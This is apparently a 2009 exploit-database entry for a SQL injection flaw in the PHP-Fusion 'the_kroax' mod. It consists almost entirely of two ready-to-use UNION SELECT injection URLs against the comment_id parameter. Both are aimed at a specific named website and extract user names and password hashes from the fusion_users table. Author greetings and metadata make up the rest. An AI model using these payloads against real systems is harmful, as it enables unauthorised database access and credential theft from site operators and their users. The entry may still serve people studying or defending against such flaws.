PHP-Fusion Mod the_kroax - SQL Injection

Author: FasTWORM
type: webapps
platform: php
port: 
date_added: 2009-01-10 
date_updated: 2017-01-13 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url:

PHP-Fusion Mod the_kroax (comment_id) SQL Injection Vulnerability
-----------------------------------------------------------------------------------------------------------

[+]Author by : FasTWORM
[+]home: Cyber-Warrior.Org
[+]exploit:
[+]http://www.beylerli.com/infusions/the_kroax/callcomments.php?comment_id=-999'+union+select+0,1905,2,3,user_name,5,6,1905+from+fusion_users/*
[+]http://www.beylerli.com/infusions/the_kroax/callcomments.php?comment_id=-999'+union+select+0,1905,2,3,user_password,5,6,1905+from+fusion_users/*

----------------------------------------------------------------------------------------------------------------------
[+]Greetz : BackDooR , Tr-ShaRk , All CW Users
[+]Note   : Bugun DoÄŸum GÃ¼nÃ¼m :)
----------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2009-01-11]